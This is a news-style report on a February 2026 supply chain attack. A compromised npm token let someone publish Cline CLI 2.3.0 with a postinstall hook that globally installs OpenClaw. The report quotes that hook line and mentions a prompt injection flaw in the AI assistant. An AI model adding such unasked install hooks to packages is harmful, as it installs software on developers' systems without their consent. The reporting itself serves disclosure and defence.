Cline CLI Supply Chain Attack Installs OpenClaw on Developer Systems

A recent supply chain attack compromised the Cline CLI, an AI-powered coding assistant, leading to the unauthorized installation of OpenClaw, a self-hosted AI agent, on developer systems. The incident, which occurred between 3:26 AM PT and 11:30 AM PT on February 17, 2026, affected approximately 4,000 downloads of Cline CLI version 2.3.0.

Details of the Attack

The attack stemmed from a compromised npm publish token that allowed an unauthorized party to publish a malicious update to Cline CLI on the NPM registry. This update included a modified package.json file with a postinstall script designed to automatically install OpenClaw: "postinstall": "npm install -g openclaw@latest". The Hacker News and StepSecurity both reported on the incident.

Cline maintainers have stated that no other modifications were made to the package and no malicious behavior beyond the OpenClaw installation was observed. However, the installation of OpenClaw was not authorized or intended. The Register notes that OpenClaw itself is a legitimate open-source project.

Timeline and Response

The compromised package was available for approximately eight hours before being deprecated by Cline maintainers. The team has since released version 2.4.0 to mitigate the issue and revoked the compromised npm token. They have similarly updated the npm publishing mechanism to utilize OpenID Connect (OIDC) via GitHub Actions for improved security.

Impact and Detection

Microsoft Threat Intelligence reported a “small but noticeable uptick” in OpenClaw installations coinciding with the Cline CLI supply chain compromise. StepSecurity’s npm monitoring system detected the suspicious release on February 17, 2026, at 11:40 UTC. The incident was also independently discovered by security researcher Adnan Khan, who had previously identified a prompt injection vulnerability in Cline that could have been exploited for this type of attack.

Mitigation

Users who installed Cline CLI version 2.3.0 between 3:26 AM PT and 11:30 AM PT on February 17, 2026, are advised to update to version 2.4.0 or higher and verify their systems for the presence of OpenClaw. The attack did not impact Cline’s Visual Studio Code (VS Code) extension or JetBrains plugin.

Key Takeaways

• A compromised npm token allowed for the unauthorized publication of a malicious Cline CLI package.
• The malicious package automatically installed OpenClaw on affected systems.
• Approximately 4,000 developers were impacted by the attack.
• Cline maintainers have released a fix and improved their publishing security measures.
• Users should update to the latest version of Cline CLI and check for unauthorized OpenClaw installations.